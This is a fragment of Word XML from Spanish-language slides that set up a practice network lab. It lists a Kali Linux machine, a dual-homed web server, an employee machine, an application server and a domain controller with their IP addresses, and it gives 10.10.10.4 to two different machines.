    <w:p w14:paraId="2E6ABB9B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FABF9B5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13976AC6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="490"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32E7F57D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1179"/>
        </w:tabs>
        <w:ind w:left="1179" w:hanging="450"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Instalaremos 2 máquinas asignadas a roles en una red externa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C181CC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1901"/>
        </w:tabs>
        <w:spacing w:before="568" w:line="484" w:lineRule="exact"/>
        <w:ind w:left="1901"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Kali Linux [EX – 192.168.50.2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259D2A3B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1901"/>
        </w:tabs>
        <w:spacing w:line="484" w:lineRule="exact"/>
        <w:ind w:left="1901"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId156">
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>Servidor web</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="0462C1"/>
          <w:spacing w:val="77"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>[EX - 192.168.50.3, INT – 10.10.10.5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1969D8FA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="471"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CB5A380" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1178"/>
          <w:tab w:val="left" w:pos="1180"/>
        </w:tabs>
        <w:spacing w:line="235" w:lineRule="auto"/>
        <w:ind w:right="1757"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>La máquina del servidor web tiene 2 redes y debe ser directamente accesible desde la red del atacante.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4E0D37" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="561"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="605DB4CB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1179"/>
        </w:tabs>
        <w:ind w:left="1179" w:hanging="450"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Sin embargo, el empleado-máquina está en la red interna</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EDCA55" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="0" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E77D8A7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1429"/>
        </w:tabs>
        <w:spacing w:before="50"/>
        <w:ind w:left="1429" w:hanging="450"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>La tabla de asignación de IP tiene el siguiente aspecto:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BF33DE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1035A424" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="70"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableNormal"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1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5553"/>
        <w:gridCol w:w="5553"/>
        <w:gridCol w:w="5553"/>
      </w:tblGrid>
      <w:tr w:rsidR="001B199E" w:rsidRPr="007A7B84" w14:paraId="20896FFB" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1193"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5553" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4471C4"/>
          </w:tcPr>
          <w:p w14:paraId="74E6C068" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="54"/>
              <w:ind w:left="23" w:right="6"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Nombre de la máquina</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5553" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4471C4"/>
          </w:tcPr>
          <w:p w14:paraId="537052FC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="54"/>
              <w:ind w:left="23" w:right="2"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Dirección IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5553" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4471C4"/>
          </w:tcPr>
          <w:p w14:paraId="172C7B78" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="54"/>
              <w:ind w:left="23" w:right="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Red</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B199E" w:rsidRPr="007A7B84" w14:paraId="7751BA4E" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5553" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CFD4EA"/>
          </w:tcPr>
          <w:p w14:paraId="5399AB4D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="36"/>
              <w:ind w:left="23" w:right="2"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:spacing w:val="-4"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Servidor web</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5553" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CFD4EA"/>
          </w:tcPr>
          <w:p w14:paraId="494D8EE0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="36" w:line="436" w:lineRule="exact"/>
              <w:ind w:left="23"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>192.168.50.3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F6F026A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0" w:line="436" w:lineRule="exact"/>
              <w:ind w:left="23"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>10.10.10.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5553" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CFD4EA"/>
          </w:tcPr>
          <w:p w14:paraId="20BC6A96" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="43" w:line="235" w:lineRule="auto"/>
              <w:ind w:left="1500" w:right="1441" w:hanging="29"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Red externa Red interna</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B199E" w:rsidRPr="007A7B84" w14:paraId="3585D917" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="927"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5553" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E9EBF5"/>
          </w:tcPr>
          <w:p w14:paraId="15653CEC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="23" w:right="4"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Empleado-Máquina</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5553" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E9EBF5"/>
          </w:tcPr>
          <w:p w14:paraId="67DEE381" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="23"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>10.10.10.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5553" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E9EBF5"/>
          </w:tcPr>
          <w:p w14:paraId="6CCAA76C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="23" w:right="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Red Interna</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B199E" w:rsidRPr="007A7B84" w14:paraId="3F7BDFB2" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="988"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5553" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="CFD4EA"/>
          </w:tcPr>
          <w:p w14:paraId="6AE60EC3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="23"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Servidor de aplicaciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5553" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="CFD4EA"/>
          </w:tcPr>
          <w:p w14:paraId="16D12CA7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="23"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>10.10.10.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5553" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="CFD4EA"/>
          </w:tcPr>
          <w:p w14:paraId="71AAC607" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="23" w:right="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Red Interna</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B199E" w:rsidRPr="007A7B84" w14:paraId="2397C9D5" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1486"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5553" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E9EBF5"/>
          </w:tcPr>
          <w:p w14:paraId="0E4191E6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="23" w:right="5"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Controlador de dominio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5553" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E9EBF5"/>
          </w:tcPr>
          <w:p w14:paraId="0486DD0E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="23"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>10.10.10.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5553" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E9EBF5"/>
          </w:tcPr>
          <w:p w14:paraId="44DB13EA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="23" w:right="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Red Interna</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1126B158" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1429"/>
        </w:tabs>
        <w:spacing w:before="555" w:line="581" w:lineRule="exact"/>
        <w:ind w:left="1429" w:hanging="450"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Necesitamos agregar adaptadores de red virtual a las máquinas en la red externa, vamos a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146E42F4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:line="581" w:lineRule="exact"/>
        <w:ind w:left="1430"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Ensuciarnos las manos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650B5724" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
